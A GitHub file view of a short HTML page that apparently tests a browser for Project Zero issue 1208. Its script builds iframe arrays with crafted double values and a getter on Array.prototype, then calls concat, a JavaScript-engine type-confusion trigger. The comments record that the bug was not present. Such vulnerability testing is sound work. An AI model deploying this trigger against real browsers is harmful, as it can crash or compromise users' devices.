-
Notifications
You must be signed in to change notification settings - Fork 0
/
1208.html
23 lines (21 loc) · 838 Bytes
/
1208.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<!--Tested on 5.5.1-->
<!--Bug tested: https://bugs.chromium.org/p/project-zero/issues/detail?id=1208 / https://pastebin.com/buAqEm74-->
<!--Result: Bug not present-->
<html>
<body>
Hi!
Status: <div id='status'>😴 waiting... click go.</div>
<script>
window.onload = function(){
alert("test2");
Array.prototype.__defineGetter__(100, function(){return 1});
var f = document.body.appendChild(document.createElement('iframe'));
var a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
var b = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
alert("test");
var c = Array.prototype.concat.call(a, b);
alert(c);
}
</script>
</body>
</html>